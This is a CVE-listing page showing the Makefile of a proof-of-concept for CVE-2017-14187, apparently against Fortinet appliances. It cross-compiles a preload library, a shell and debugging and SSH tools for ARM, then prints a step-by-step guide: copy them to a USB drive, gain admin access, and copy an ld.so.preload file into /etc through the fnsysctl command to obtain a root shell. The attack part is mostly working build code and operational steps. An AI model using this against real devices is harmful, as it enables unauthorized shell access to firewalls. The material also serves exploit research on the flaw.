4837 Total CVEs
26 Years
GitHub
Home / 2017 / CVE-2017-14187
README.md
Rendering markdown...
POC / Makefile
⬇ Raw GitHub ✕ Close 
_PATH=PATH=$(PATH):$(PWD)/armv7l-linux-musleabihf-cross/bin
_LDFLAGS=LDFLAGS="-static -s -Os"
GDB_VER=10.1# I recommend to do not change the version. Latest version will cause horrible deps problem which I couldn't address. I gave up.
BASH_VER=5.2.37
BINUTILS_VER=2.45
FILE_VER=5.46

ld.so.preload: build/shell.so
	echo /usb/shell.so > build/ld.so.preload
	@echo
	@echo ------------------------------------------------------------------------------------------------------------------------
	@echo CVE-2017-14187 PoC for local debugging \& exploit development
	@echo by 0xSIGILL
	@echo
	@echo ALL DONE!
	@echo
	@echo INSTALLATION GUIDE
	@echo 1. Prepare a USB drive. The USB drive must have a MBR partition and FAT32 or FAT16 fs.
	@echo 2. Copy the contents of build directory to your USB drive.
	@echo 3. Insert it to your vulnerable FortiSomething.
	@echo 4. Open the console via admin webui.
	@echo 5. Get system_admin access. If you don\'t know what it is, see the official fortinet document \"config system admin\"
	@echo 6. Type \"fnsysctl cp /usb/ld.so.preload /etc\" and then enter your super_admin account creds.
	@echo 7. Type \"fnsysctl ls\" or command whatever you want.
	@echo    It will install some symlinks for Busybox shell. Try one more. Then you will get a shell.
	@echo 8. Enjoy\)\)
	@echo ------------------------------------------------------------------------------------------------------------------------

build/shell.so: shell.c build/bin/gdb build/bin/dropbear build/busybox-armv7l build/bin/bash build/bin/neofetch build/bin/readelf build/bin/file
	$(_PATH) $(_LDFLAGS) armv7l-linux-musleabihf-gcc -fPIC -shared -static -s shell.c -o build/shell.so

build/bin/dropbear: dir armv7l-linux-musleabihf-cross dropbear
	cd dropbear && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-zlib --disable-utmp --disable-wtmp && $(_PATH) $(_LDFLAGS) make -j$(nproc) && cd ..
	cp dropbear/dbclient dropbear/dropbear dropbear/dropbearconvert dropbear/dropbearkey -t build/bin

build/bin/gdb: dir armv7l-linux-musleabihf-cross gdb-$(GDB_VER)
	cd gdb-$(GDB_VER) && $(_PATH) $(_LDFLAGS) ./configure --host=armv7l-linux-musleabihf --disable-source-highlight --disable-sim && $(_PATH) make -j$(nproc) && cd ..
	cp gdb-$(GDB_VER)/gdbserver/gdbserver gdb-$(GDB_VER)/gdb/gdb gdb-$(GDB_VER)/gdb/gcore -t build/bin
	sed -i '1s|.*|#!/usb/bin/bash|' build/bin/gcore

build/bin/bash: dir armv7l-linux-musleabihf-cross bash-$(BASH_VER)
	cd bash-$(BASH_VER) && CC_FOR_BUILD="gcc -std=gnu99" $(_PATH) $(_LDFLAGS) CFLAGS="-Wno-error=implicit-function-declaration" ./configure --host=armv7l-linux-musleabihf --without-bash-malloc && $(_PATH) $(_LDFLAGS) make -j$(nproc) && cd ..
	cp bash-$(BASH_VER)/bash build/bin/bash

build/bin/readelf:dir armv7l-linux-musleabihf-cross binutils-$(BINUTILS_VER)
	cd binutils-$(BINUTILS_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$(nproc) && cd ..
	cp binutils-$(BINUTILS_VER)/binutils/addr2line binutils-$(BINUTILS_VER)/binutils/ar binutils-$(BINUTILS_VER)/binutils/cxxfilt binutils-$(BINUTILS_VER)/binutils/elfedit binutils-$(BINUTILS_VER)/binutils/objcopy binutils-$(BINUTILS_VER)/binutils/objdump binutils-$(BINUTILS_VER)/binutils/ranlib binutils-$(BINUTILS_VER)/binutils/readelf binutils-$(BINUTILS_VER)/binutils/size -t build/bin

build/bin/file: dir armv7l-linux-musleabihf-cross file-$(FILE_VER)
	cd file-$(FILE_VER) && $(_PATH) LDFLAGS="--static -static -s -Os" ./configure --host=armv7l-linux-musleabihf --disable-shared --enable-static && $(_PATH) make -j$(nproc) && cd ..
	cp file-$(FILE_VER)/src/file file-$(FILE_VER)/magic/magic.mgc -t build/bin

build/busybox-armv7l:
	wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv7l -O build/busybox-armv7l

build/bin/neofetch:
	wget https://raw.githubusercontent.com/dylanaraps/neofetch/refs/heads/master/neofetch -O build/bin/neofetch
	sed -i '1s|.*|#!/usb/bin/bash|' build/bin/neofetch

armv7l-linux-musleabihf-cross:
	wget https://musl.cc/armv7l-linux-musleabihf-cross.tgz
	tar -xvf armv7l-linux-musleabihf-cross.tgz

gdb-$(GDB_VER):
	wget https://ftp.gnu.org/gnu/gdb/gdb-$(GDB_VER).tar.xz
	tar -xvf gdb-$(GDB_VER).tar.xz

dropbear:
	git clone https://github.com/mkj/dropbear.git -b DROPBEAR_2025.88

binutils-$(BINUTILS_VER):
	wget https://ftp.gnu.org/gnu/binutils/binutils-$(BINUTILS_VER).tar.xz
	tar -xvf binutils-$(BINUTILS_VER).tar.xz

bash-$(BASH_VER):
	wget https://ftp.gnu.org/gnu/bash/bash-$(BASH_VER).tar.gz
	tar -xvf bash-$(BASH_VER).tar.gz

file-$(FILE_VER):
	wget https://astron.com/pub/file/file-$(FILE_VER).tar.gz
	tar -xvf file-$(FILE_VER).tar.gz

dir:
	mkdir -p build/bin
	mkdir -p build/home

clean:
	rm -rf gdb-$(GDB_VER)* dropbear armv7l-linux-musleabihf-cross* *.o build bash*